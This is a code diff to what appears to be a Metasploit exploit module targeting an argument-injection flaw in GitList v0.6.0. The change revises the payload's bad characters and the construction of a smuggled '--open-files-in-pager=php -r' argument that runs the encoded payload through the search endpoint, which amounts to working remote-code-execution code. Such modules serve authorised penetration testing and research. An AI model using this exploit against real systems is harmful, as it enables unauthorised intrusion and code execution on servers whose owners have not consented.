diff --git a/modules/exploits/multi/http/gitlist_arg_injection.rb b/modules/exploits/multi/http/gitlist_arg_injection.rb
index 477a0b4cd5..7ddf1ff83f 100644
--- a/modules/exploits/multi/http/gitlist_arg_injection.rb
+++ b/modules/exploits/multi/http/gitlist_arg_injection.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'GitList v0.6.0', { } ]
         ],
       'Privileged'     => false,
-      'Payload'        => { 'BadChars' => '\'"' },
+      'Payload'        => { 'BadChars' => '\'' },
       'DisclosureDate' => "Apr 26 2018",
       'DefaultTarget'  => 0))
   end
@@ -55,9 +55,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
-    cmd = '--open-files-in-pager=php -r "eval(\\"'
+    cmd = '--open-files-in-pager=php -r "'
     cmd << payload.encoded
-    cmd << '\\");"'
+    cmd << ';"'
     send_request_cgi(
       'method' => 'POST',
       'uri'    => postUri,